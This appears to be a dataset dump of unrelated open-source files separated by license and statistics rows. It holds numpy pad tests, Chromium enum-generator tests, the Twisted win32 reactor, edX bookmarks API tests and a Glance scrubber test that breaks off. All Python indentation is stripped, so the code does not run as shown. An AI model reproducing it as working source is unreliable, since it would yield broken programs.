arr = np.arange(30)
assert_raises(TypeError, pad, arr, complex(1, -1))
assert_raises(TypeError, pad, arr, np.array(complex(1, -1)))
def test_check_wrong_pad_amount(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(3, ))
assert_raises(TypeError, pad, arr, ((2, 3, 4), (3, 2)),
**kwargs)
if __name__ == "__main__":
np.testing.run_module_suite()
| gpl-3.0 | -4,079,673,579,535,790,600 | 38.836828 | 78 | 0.373836 | false |
danakj/chromium | build/android/gyp/java_cpp_enum_tests.py | 1 | 16358 | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for enum_preprocess.py.
This test suite containss various tests for the C++ -> Java enum generator.
"""
import collections
from datetime import date
import optparse
import os
import sys
import unittest
import java_cpp_enum
from java_cpp_enum import EnumDefinition, GenerateOutput, GetScriptName
from java_cpp_enum import HeaderParser
sys.path.append(os.path.join(os.path.dirname(__file__), "gyp"))
from util import build_utils
class TestPreprocess(unittest.TestCase):
def testOutput(self):
definition = EnumDefinition(original_enum_name='ClassName',
enum_package='some.package',
entries=[('E1', 1), ('E2', '2 << 2')],
comments=[('E2', 'This is a comment.'),
('E1', 'This is a multiple line '
'comment that is really long. '
'This is a multiple line '
'comment that is really '
'really long.')])
output = GenerateOutput('path/to/file', definition)
expected = """
// Copyright %d The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This file is autogenerated by
// %s
// From
// path/to/file
package some.package;
import android.support.annotation.IntDef;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
public class ClassName {
@IntDef({
E1, E2
})
@Retention(RetentionPolicy.SOURCE)
public @interface ClassNameEnum {}
/**
* %s
* really really long.
*/
public static final int E1 = 1;
/**
* This is a comment.
*/
public static final int E2 = 2 << 2;
}
"""
long_comment = ('This is a multiple line comment that is really long. '
'This is a multiple line comment that is')
self.assertEqual(
expected % (date.today().year, GetScriptName(), long_comment),
output)
def testParseSimpleEnum(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum EnumName {
VALUE_ZERO,
VALUE_ONE,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(1, len(definitions))
definition = definitions[0]
self.assertEqual('EnumName', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual(collections.OrderedDict([('VALUE_ZERO', 0),
('VALUE_ONE', 1)]),
definition.entries)
def testParseBitShifts(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum EnumName {
VALUE_ZERO = 1 << 0,
VALUE_ONE = 1 << 1,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(1, len(definitions))
definition = definitions[0]
self.assertEqual('EnumName', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual(collections.OrderedDict([('VALUE_ZERO', '1 << 0'),
('VALUE_ONE', '1 << 1')]),
definition.entries)
def testParseClassNameOverride(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
// GENERATED_JAVA_CLASS_NAME_OVERRIDE: OverrideName
enum EnumName {
FOO
};
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
// GENERATED_JAVA_CLASS_NAME_OVERRIDE: OtherOverride
enum PrefixTest {
PREFIX_TEST_A,
PREFIX_TEST_B,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(2, len(definitions))
definition = definitions[0]
self.assertEqual('OverrideName', definition.class_name)
definition = definitions[1]
self.assertEqual('OtherOverride', definition.class_name)
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 1)]),
definition.entries)
def testParseTwoEnums(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum EnumOne {
ENUM_ONE_A = 1,
// Comment there
ENUM_ONE_B = A,
};
enum EnumIgnore {
C, D, E
};
// GENERATED_JAVA_ENUM_PACKAGE: other.package
// GENERATED_JAVA_PREFIX_TO_STRIP: P_
enum EnumTwo {
P_A,
// This comment spans
// two lines.
P_B
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(2, len(definitions))
definition = definitions[0]
self.assertEqual('EnumOne', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual(collections.OrderedDict([('A', '1'),
('B', 'A')]),
definition.entries)
self.assertEqual(collections.OrderedDict([('ENUM_ONE_B', 'Comment there')]),
definition.comments)
definition = definitions[1]
self.assertEqual('EnumTwo', definition.class_name)
self.assertEqual('other.package', definition.enum_package)
self.assertEqual(collections.OrderedDict(
[('P_B', 'This comment spans two lines.')]), definition.comments)
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 1)]),
definition.entries)
def testParseThrowsOnUnknownDirective(self):
test_data = """
// GENERATED_JAVA_UNKNOWN: Value
enum EnumName {
VALUE_ONE,
};
""".split('\n')
with self.assertRaises(Exception):
HeaderParser(test_data).ParseDefinitions()
def testParseReturnsEmptyListWithoutDirectives(self):
test_data = """
enum EnumName {
VALUE_ONE,
};
""".split('\n')
self.assertEqual([], HeaderParser(test_data).ParseDefinitions())
def testParseEnumClass(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum class Foo {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(1, len(definitions))
definition = definitions[0]
self.assertEqual('Foo', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual(collections.OrderedDict([('A', 0)]),
definition.entries)
def testParseEnumStruct(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum struct Foo {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(1, len(definitions))
definition = definitions[0]
self.assertEqual('Foo', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual(collections.OrderedDict([('A', 0)]),
definition.entries)
def testParseFixedTypeEnum(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum Foo : int {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(1, len(definitions))
definition = definitions[0]
self.assertEqual('Foo', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual('int', definition.fixed_type)
self.assertEqual(collections.OrderedDict([('A', 0)]),
definition.entries)
def testParseFixedTypeEnumClass(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum class Foo: unsigned short {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(1, len(definitions))
definition = definitions[0]
self.assertEqual('Foo', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual('unsigned short', definition.fixed_type)
self.assertEqual(collections.OrderedDict([('A', 0)]),
definition.entries)
def testParseUnknownFixedTypeRaises(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum class Foo: foo_type {
FOO_A,
};
""".split('\n')
with self.assertRaises(Exception):
HeaderParser(test_data).ParseDefinitions()
def testParseSimpleMultiLineDirective(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: (
// test.namespace)
// GENERATED_JAVA_CLASS_NAME_OVERRIDE: Bar
enum Foo {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual('test.namespace', definitions[0].enum_package)
self.assertEqual('Bar', definitions[0].class_name)
def testParseMultiLineDirective(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: (te
// st.name
// space)
enum Foo {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual('test.namespace', definitions[0].enum_package)
def testParseMultiLineDirectiveWithOtherDirective(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: (
// test.namespace)
// GENERATED_JAVA_CLASS_NAME_OVERRIDE: (
// Ba
// r
// )
enum Foo {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual('test.namespace', definitions[0].enum_package)
self.assertEqual('Bar', definitions[0].class_name)
def testParseMalformedMultiLineDirectiveWithOtherDirective(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: (
// test.name
// space
// GENERATED_JAVA_CLASS_NAME_OVERRIDE: Bar
enum Foo {
FOO_A,
};
""".split('\n')
with self.assertRaises(Exception):
HeaderParser(test_data).ParseDefinitions()
def testParseMalformedMultiLineDirective(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: (
// test.name
// space
enum Foo {
FOO_A,
};
""".split('\n')
with self.assertRaises(Exception):
HeaderParser(test_data).ParseDefinitions()
def testParseMalformedMultiLineDirectiveShort(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: (
enum Foo {
FOO_A,
};
""".split('\n')
with self.assertRaises(Exception):
HeaderParser(test_data).ParseDefinitions()
def testEnumValueAssignmentNoneDefined(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('A', None)
definition.AppendEntry('B', None)
definition.AppendEntry('C', None)
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 1),
('C', 2)]),
definition.entries)
def testEnumValueAssignmentAllDefined(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('A', '1')
definition.AppendEntry('B', '2')
definition.AppendEntry('C', '3')
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', '1'),
('B', '2'),
('C', '3')]),
definition.entries)
def testEnumValueAssignmentReferences(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('A', None)
definition.AppendEntry('B', 'A')
definition.AppendEntry('C', None)
definition.AppendEntry('D', 'C')
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 0),
('C', 1),
('D', 1)]),
definition.entries)
def testEnumValueAssignmentSet(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('A', None)
definition.AppendEntry('B', '2')
definition.AppendEntry('C', None)
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 2),
('C', 3)]),
definition.entries)
def testEnumValueAssignmentSetReferences(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('A', None)
definition.AppendEntry('B', 'A')
definition.AppendEntry('C', 'B')
definition.AppendEntry('D', None)
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 0),
('C', 0),
('D', 1)]),
definition.entries)
def testEnumValueAssignmentRaises(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('A', None)
definition.AppendEntry('B', 'foo')
definition.AppendEntry('C', None)
with self.assertRaises(Exception):
definition.Finalize()
def testExplicitPrefixStripping(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('P_A', None)
definition.AppendEntry('B', None)
definition.AppendEntry('P_C', None)
definition.AppendEntry('P_LAST', 'P_C')
definition.prefix_to_strip = 'P_'
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 1),
('C', 2),
('LAST', 2)]),
definition.entries)
def testImplicitPrefixStripping(self):
definition = EnumDefinition(original_enum_name='ClassName',
enum_package='p')
definition.AppendEntry('CLASS_NAME_A', None)
definition.AppendEntry('CLASS_NAME_B', None)
definition.AppendEntry('CLASS_NAME_C', None)
definition.AppendEntry('CLASS_NAME_LAST', 'CLASS_NAME_C')
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 1),
('C', 2),
('LAST', 2)]),
definition.entries)
def testImplicitPrefixStrippingRequiresAllConstantsToBePrefixed(self):
definition = EnumDefinition(original_enum_name='Name',
enum_package='p')
definition.AppendEntry('A', None)
definition.AppendEntry('B', None)
definition.AppendEntry('NAME_LAST', None)
definition.Finalize()
self.assertEqual(['A', 'B', 'NAME_LAST'], definition.entries.keys())
def testGenerateThrowsOnEmptyInput(self):
with self.assertRaises(Exception):
original_do_parse = java_cpp_enum.DoParseHeaderFile
try:
java_cpp_enum.DoParseHeaderFile = lambda _: []
for _ in java_cpp_enum.DoGenerate(['file']):
pass
finally:
java_cpp_enum.DoParseHeaderFile = original_do_parse
def main(argv):
parser = optparse.OptionParser()
parser.add_option("--stamp", help="File to touch on success.")
options, _ = parser.parse_args(argv)
suite = unittest.TestLoader().loadTestsFromTestCase(TestPreprocess)
unittest.TextTestRunner(verbosity=0).run(suite)
if options.stamp:
build_utils.Touch(options.stamp)
if __name__ == '__main__':
main(sys.argv[1:])
| bsd-3-clause | 2,689,006,067,536,789,000 | 33.804255 | 80 | 0.585341 | false |
hortonworks/hortonworks-sandbox | desktop/core/ext-py/Twisted/twisted/internet/win32eventreactor.py | 12 | 7652 | # Copyright (c) 2001-2007 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
A win32event based implementation of the Twisted main loop.
This requires win32all or ActivePython to be installed.
Maintainer: Itamar Shtull-Trauring
LIMITATIONS:
1. WaitForMultipleObjects and thus the event loop can only handle 64 objects.
2. Process running has some problems (see Process docstring).
TODO:
1. Event loop handling of writes is *very* problematic (this is causing failed tests).
Switch to doing it the correct way, whatever that means (see below).
2. Replace icky socket loopback waker with event based waker (use dummyEvent object)
3. Switch everyone to using Free Software so we don't have to deal with proprietary APIs.
ALTERNATIVE SOLUTIONS:
- IIRC, sockets can only be registered once. So we switch to a structure
like the poll() reactor, thus allowing us to deal with write events in
a decent fashion. This should allow us to pass tests, but we're still
limited to 64 events.
Or:
- Instead of doing a reactor, we make this an addon to the select reactor.
The WFMO event loop runs in a separate thread. This means no need to maintain
separate code for networking, 64 event limit doesn't apply to sockets,
we can run processes and other win32 stuff in default event loop. The
only problem is that we're stuck with the icky socket based waker.
Another benefit is that this could be extended to support >64 events
in a simpler manner than the previous solution.
The 2nd solution is probably what will get implemented.
"""
# System imports
import time
import sys
from zope.interface import implements
# Win32 imports
from win32file import WSAEventSelect, FD_READ, FD_CLOSE, FD_ACCEPT, FD_CONNECT
from win32event import CreateEvent, MsgWaitForMultipleObjects
from win32event import WAIT_OBJECT_0, WAIT_TIMEOUT, QS_ALLINPUT, QS_ALLEVENTS
import win32gui
# Twisted imports
from twisted.internet import posixbase
from twisted.python import log, threadable, failure
from twisted.internet.interfaces import IReactorFDSet, IReactorProcess
from twisted.internet._dumbwin32proc import Process
class Win32Reactor(posixbase.PosixReactorBase):
"""
Reactor that uses Win32 event APIs.
@ivar _reads: A dictionary mapping L{FileDescriptor} instances to a
win32 event object used to check for read events for that descriptor.
@ivar _writes: A dictionary mapping L{FileDescriptor} instances to a
arbitrary value. Keys in this dictionary will be given a chance to
write out their data.
@ivar _events: A dictionary mapping win32 event object to tuples of
L{FileDescriptor} instances and event masks.
"""
implements(IReactorFDSet, IReactorProcess)
dummyEvent = CreateEvent(None, 0, 0, None)
def __init__(self):
self._reads = {}
self._writes = {}
self._events = {}
posixbase.PosixReactorBase.__init__(self)
def _makeSocketEvent(self, fd, action, why):
"""
Make a win32 event object for a socket.
"""
event = CreateEvent(None, 0, 0, None)
WSAEventSelect(fd, event, why)
self._events[event] = (fd, action)
return event
def addEvent(self, event, fd, action):
"""
Add a new win32 event to the event loop.
"""
self._events[event] = (fd, action)
def removeEvent(self, event):
"""
Remove an event.
"""
del self._events[event]
def addReader(self, reader):
"""
Add a socket FileDescriptor for notification of data available to read.
"""
if reader not in self._reads:
self._reads[reader] = self._makeSocketEvent(
reader, 'doRead', FD_READ | FD_ACCEPT | FD_CONNECT | FD_CLOSE)
def addWriter(self, writer):
"""
Add a socket FileDescriptor for notification of data available to write.
"""
if writer not in self._writes:
self._writes[writer] = 1
def removeReader(self, reader):
"""Remove a Selectable for notification of data available to read.
"""
if reader in self._reads:
del self._events[self._reads[reader]]
del self._reads[reader]
def removeWriter(self, writer):
"""Remove a Selectable for notification of data available to write.
"""
if writer in self._writes:
del self._writes[writer]
def removeAll(self):
"""
Remove all selectables, and return a list of them.
"""
return self._removeAll(self._reads, self._writes)
def getReaders(self):
return self._reads.keys()
def getWriters(self):
return self._writes.keys()
def doWaitForMultipleEvents(self, timeout):
log.msg(channel='system', event='iteration', reactor=self)
if timeout is None:
#timeout = INFINITE
timeout = 100
else:
timeout = int(timeout * 1000)
if not (self._events or self._writes):
# sleep so we don't suck up CPU time
time.sleep(timeout / 1000.0)
return
canDoMoreWrites = 0
for fd in self._writes.keys():
if log.callWithLogger(fd, self._runWrite, fd):
canDoMoreWrites = 1
if canDoMoreWrites:
timeout = 0
handles = self._events.keys() or [self.dummyEvent]
val = MsgWaitForMultipleObjects(handles, 0, timeout, QS_ALLINPUT | QS_ALLEVENTS)
if val == WAIT_TIMEOUT:
return
elif val == WAIT_OBJECT_0 + len(handles):
exit = win32gui.PumpWaitingMessages()
if exit:
self.callLater(0, self.stop)
return
elif val >= WAIT_OBJECT_0 and val < WAIT_OBJECT_0 + len(handles):
fd, action = self._events[handles[val - WAIT_OBJECT_0]]
log.callWithLogger(fd, self._runAction, action, fd)
def _runWrite(self, fd):
closed = 0
try:
closed = fd.doWrite()
except:
closed = sys.exc_info()[1]
log.deferr()
if closed:
self.removeReader(fd)
self.removeWriter(fd)
try:
fd.connectionLost(failure.Failure(closed))
except:
log.deferr()
elif closed is None:
return 1
def _runAction(self, action, fd):
try:
closed = getattr(fd, action)()
except:
closed = sys.exc_info()[1]
log.deferr()
if closed:
self._disconnectSelectable(fd, closed, action == 'doRead')
doIteration = doWaitForMultipleEvents
def spawnProcess(self, processProtocol, executable, args=(), env={}, path=None, uid=None, gid=None, usePTY=0, childFDs=None):
"""Spawn a process."""
if uid is not None:
raise ValueError("Setting UID is unsupported on this platform.")
if gid is not None:
raise ValueError("Setting GID is unsupported on this platform.")
if usePTY:
raise ValueError("PTYs are unsupported on this platform.")
if childFDs is not None:
raise ValueError(
"Custom child file descriptor mappings are unsupported on "
"this platform.")
args, env = self._checkProcessArgs(args, env)
return Process(self, processProtocol, executable, args, env, path)
def install():
threadable.init(1)
r = Win32Reactor()
import main
main.installReactor(r)
__all__ = ["Win32Reactor", "install"]
| apache-2.0 | 1,281,924,427,443,840,800 | 30.360656 | 129 | 0.632384 | false |
zhenzhai/edx-platform | openedx/core/djangoapps/bookmarks/tests/test_api.py | 14 | 10243 | """
Tests for bookmarks api.
"""
import ddt
from mock import patch
from nose.plugins.attrib import attr
from unittest import skipUnless
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from opaque_keys.edx.keys import UsageKey
from xmodule.modulestore.exceptions import ItemNotFoundError
from .. import api
from ..models import Bookmark
from openedx.core.djangoapps.bookmarks.api import BookmarksLimitReachedError
from .test_models import BookmarksTestsBase
class BookmarkApiEventTestMixin(object):
""" Mixin for verifying that bookmark api events were emitted during a test. """
def assert_bookmark_event_emitted(self, mock_tracker, event_name, **kwargs):
""" Assert that an event has been emitted. """
mock_tracker.assert_any_call(
event_name,
kwargs,
)
def assert_no_events_were_emitted(self, mock_tracker):
"""
Assert no events were emitted.
"""
self.assertFalse(mock_tracker.called) # pylint: disable=maybe-no-member
@attr('shard_2')
@ddt.ddt
@skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Tests only valid in LMS')
class BookmarksAPITests(BookmarkApiEventTestMixin, BookmarksTestsBase):
"""
These tests cover the parts of the API methods.
"""
def setUp(self):
super(BookmarksAPITests, self).setUp()
def test_get_bookmark(self):
"""
Verifies that get_bookmark returns data as expected.
"""
bookmark_data = api.get_bookmark(user=self.user, usage_key=self.sequential_1.location)
self.assert_bookmark_data_is_valid(self.bookmark_1, bookmark_data)
# With Optional fields.
with self.assertNumQueries(1):
bookmark_data = api.get_bookmark(
user=self.user,
usage_key=self.sequential_1.location,
fields=self.ALL_FIELDS
)
self.assert_bookmark_data_is_valid(self.bookmark_1, bookmark_data, check_optional_fields=True)
def test_get_bookmark_raises_error(self):
"""
Verifies that get_bookmark raises error as expected.
"""
with self.assertNumQueries(1):
with self.assertRaises(ObjectDoesNotExist):
api.get_bookmark(user=self.other_user, usage_key=self.vertical_1.location)
@ddt.data(
1, 10, 20
)
def test_get_bookmarks(self, count):
"""
Verifies that get_bookmarks returns data as expected.
"""
course, __, bookmarks = self.create_course_with_bookmarks_count(count)
# Without course key.
with self.assertNumQueries(1):
bookmarks_data = api.get_bookmarks(user=self.user)
self.assertEqual(len(bookmarks_data), count + 3)
# Assert them in ordered manner.
self.assert_bookmark_data_is_valid(bookmarks[-1], bookmarks_data[0])
self.assert_bookmark_data_is_valid(self.bookmark_1, bookmarks_data[-1])
self.assert_bookmark_data_is_valid(self.bookmark_2, bookmarks_data[-2])
# Without course key, with optional fields.
with self.assertNumQueries(1):
bookmarks_data = api.get_bookmarks(user=self.user, fields=self.ALL_FIELDS)
self.assertEqual(len(bookmarks_data), count + 3)
self.assert_bookmark_data_is_valid(bookmarks[-1], bookmarks_data[0])
self.assert_bookmark_data_is_valid(self.bookmark_1, bookmarks_data[-1])
# With course key.
with self.assertNumQueries(1):
bookmarks_data = api.get_bookmarks(user=self.user, course_key=course.id)
self.assertEqual(len(bookmarks_data), count)
self.assert_bookmark_data_is_valid(bookmarks[-1], bookmarks_data[0])
self.assert_bookmark_data_is_valid(bookmarks[0], bookmarks_data[-1])
# With course key, with optional fields.
with self.assertNumQueries(1):
bookmarks_data = api.get_bookmarks(user=self.user, course_key=course.id, fields=self.ALL_FIELDS)
self.assertEqual(len(bookmarks_data), count)
self.assert_bookmark_data_is_valid(bookmarks[-1], bookmarks_data[0])
self.assert_bookmark_data_is_valid(bookmarks[0], bookmarks_data[-1])
# Without Serialized.
with self.assertNumQueries(1):
bookmarks = api.get_bookmarks(user=self.user, course_key=course.id, serialized=False)
self.assertEqual(len(bookmarks), count)
self.assertTrue(bookmarks.model is Bookmark) # pylint: disable=no-member
@patch('openedx.core.djangoapps.bookmarks.api.tracker.emit')
def test_create_bookmark(self, mock_tracker):
"""
Verifies that create_bookmark create & returns data as expected.
"""
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.course.id)), 2)
with self.assertNumQueries(9):
bookmark_data = api.create_bookmark(user=self.user, usage_key=self.vertical_2.location)
self.assert_bookmark_event_emitted(
mock_tracker,
event_name='edx.bookmark.added',
course_id=unicode(self.course_id),
bookmark_id=bookmark_data['id'],
component_type=self.vertical_2.location.block_type,
component_usage_id=unicode(self.vertical_2.location),
)
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.course.id)), 3)
@patch('openedx.core.djangoapps.bookmarks.api.tracker.emit')
def test_create_bookmark_do_not_create_duplicates(self, mock_tracker):
"""
Verifies that create_bookmark do not create duplicate bookmarks.
"""
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.course.id)), 2)
with self.assertNumQueries(9):
bookmark_data = api.create_bookmark(user=self.user, usage_key=self.vertical_2.location)
self.assert_bookmark_event_emitted(
mock_tracker,
event_name='edx.bookmark.added',
course_id=unicode(self.course_id),
bookmark_id=bookmark_data['id'],
component_type=self.vertical_2.location.block_type,
component_usage_id=unicode(self.vertical_2.location),
)
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.course.id)), 3)
mock_tracker.reset_mock()
with self.assertNumQueries(5):
bookmark_data_2 = api.create_bookmark(user=self.user, usage_key=self.vertical_2.location)
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.course.id)), 3)
self.assertEqual(bookmark_data, bookmark_data_2)
self.assert_no_events_were_emitted(mock_tracker)
@patch('openedx.core.djangoapps.bookmarks.api.tracker.emit')
def test_create_bookmark_raises_error(self, mock_tracker):
"""
Verifies that create_bookmark raises error as expected.
"""
with self.assertNumQueries(0):
with self.assertRaises(ItemNotFoundError):
api.create_bookmark(user=self.user, usage_key=UsageKey.from_string('i4x://brb/100/html/340ef1771a0940'))
self.assert_no_events_were_emitted(mock_tracker)
@patch('openedx.core.djangoapps.bookmarks.api.tracker.emit')
@patch('django.conf.settings.MAX_BOOKMARKS_PER_COURSE', 5)
def bookmark_more_than_limit_raise_error(self, mock_tracker):
"""
Verifies that create_bookmark raises error when maximum number of units
allowed to bookmark per course are already bookmarked.
"""
max_bookmarks = settings.MAX_BOOKMARKS_PER_COURSE
__, blocks, __ = self.create_course_with_bookmarks_count(max_bookmarks)
with self.assertNumQueries(1):
with self.assertRaises(BookmarksLimitReachedError):
api.create_bookmark(user=self.user, usage_key=blocks[-1].location)
self.assert_no_events_were_emitted(mock_tracker)
# if user tries to create bookmark in another course it should succeed
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.other_course.id)), 1)
api.create_bookmark(user=self.user, usage_key=self.other_chapter_1.location)
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.other_course.id)), 2)
# if another user tries to create bookmark it should succeed
self.assertEqual(len(api.get_bookmarks(user=self.other_user, course_key=blocks[-1].location.course_key)), 0)
api.create_bookmark(user=self.other_user, usage_key=blocks[-1].location)
self.assertEqual(len(api.get_bookmarks(user=self.other_user, course_key=blocks[-1].location.course_key)), 1)
@patch('openedx.core.djangoapps.bookmarks.api.tracker.emit')
def test_delete_bookmark(self, mock_tracker):
"""
Verifies that delete_bookmark removes bookmark as expected.
"""
self.assertEqual(len(api.get_bookmarks(user=self.user)), 3)
with self.assertNumQueries(3):
api.delete_bookmark(user=self.user, usage_key=self.sequential_1.location)
self.assert_bookmark_event_emitted(
mock_tracker,
event_name='edx.bookmark.removed',
course_id=unicode(self.course_id),
bookmark_id=self.bookmark_1.resource_id,
component_type=self.sequential_1.location.block_type,
component_usage_id=unicode(self.sequential_1.location),
)
bookmarks_data = api.get_bookmarks(user=self.user)
self.assertEqual(len(bookmarks_data), 2)
self.assertNotEqual(unicode(self.sequential_1.location), bookmarks_data[0]['usage_id'])
self.assertNotEqual(unicode(self.sequential_1.location), bookmarks_data[1]['usage_id'])
@patch('openedx.core.djangoapps.bookmarks.api.tracker.emit')
def test_delete_bookmark_raises_error(self, mock_tracker):
"""
Verifies that delete_bookmark raises error as expected.
"""
with self.assertNumQueries(1):
with self.assertRaises(ObjectDoesNotExist):
api.delete_bookmark(user=self.other_user, usage_key=self.vertical_1.location)
self.assert_no_events_were_emitted(mock_tracker)
| agpl-3.0 | 8,275,253,265,509,828,000 | 41.502075 | 120 | 0.664649 | false |
openstack/glance | glance/tests/functional/serial/test_scrubber.py | 1 | 16902 | # Copyright 2011-2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import sys
import time
import httplib2
from oslo_config import cfg
from oslo_serialization import jsonutils
from oslo_utils.fixture import uuidsentinel as uuids
from six.moves import http_client
# NOTE(jokke): simplified transition to py3, behaves like py2 xrange
from six.moves import range
from glance import context
import glance.db as db_api
from glance.tests import functional
from glance.tests.utils import execute
CONF = cfg.CONF
class TestScrubber(functional.FunctionalTest):
"""Test that delayed_delete works and the scrubber deletes"""
def setUp(self):
super(TestScrubber, self).setUp()
self.api_server.deployment_flavor = 'noauth'
self.api_server.send_identity_credentials = True
self.admin_context = context.get_admin_context(show_deleted=True)
CONF.set_override('sql_connection', self.api_server.sql_connection)
def _headers(self, custom_headers=None):
base_headers = {
'X-Identity-Status': 'Confirmed',
'X-Auth-Token': '932c5c84-02ac-4fe5-a9ba-620af0e2bb96',
'X-User-Id': 'f9a41d13-0c13-47e9-bee2-ce4e8bfe958e',
'X-Tenant-Id': uuids.TENANT1,
'X-Roles': 'member',
}
base_headers.update(custom_headers or {})
return base_headers
def _send_create_image_http_request(self, path, body=None):
headers = {
"Content-Type": "application/json",
"X-Roles": "admin",
}
body = body or {'container_format': 'ovf',
'disk_format': 'raw',
'name': 'test_image',
'visibility': 'public'}
body = jsonutils.dumps(body)
return httplib2.Http().request(path, 'POST', body,
self._headers(headers))
def _send_upload_image_http_request(self, path, body=None):
headers = {
"Content-Type": "application/octet-stream"
}
return httplib2.Http().request(path, 'PUT', body,
self._headers(headers))
def _send_http_request(self, path, method):
headers = {
"Content-Type": "application/json"
}
return httplib2.Http().request(path, method, None,
self._headers(headers))
def _get_pending_delete_image(self, image_id):
# In Glance V2, there is no way to get the 'pending_delete' image from
# API. So we get the image from db here for testing.
# Clean the session cache first to avoid connecting to the old db data.
db_api.get_api()._FACADE = None
image = db_api.get_api().image_get(self.admin_context, image_id)
return image
def test_delayed_delete(self):
"""
test that images don't get deleted immediately and that the scrubber
scrubs them
"""
self.cleanup()
kwargs = self.__dict__.copy()
self.start_servers(delayed_delete=True, daemon=True,
metadata_encryption_key='', **kwargs)
path = "http://%s:%d/v2/images" % ("127.0.0.1", self.api_port)
response, content = self._send_create_image_http_request(path)
self.assertEqual(http_client.CREATED, response.status)
image = jsonutils.loads(content)
self.assertEqual('queued', image['status'])
file_path = "%s/%s/file" % (path, image['id'])
response, content = self._send_upload_image_http_request(file_path,
body='XXX')
self.assertEqual(http_client.NO_CONTENT, response.status)
path = "%s/%s" % (path, image['id'])
response, content = self._send_http_request(path, 'GET')
image = jsonutils.loads(content)
self.assertEqual('active', image['status'])
response, content = self._send_http_request(path, 'DELETE')
self.assertEqual(http_client.NO_CONTENT, response.status)
image = self._get_pending_delete_image(image['id'])
self.assertEqual('pending_delete', image['status'])
self.wait_for_scrub(image['id'])
self.stop_servers()
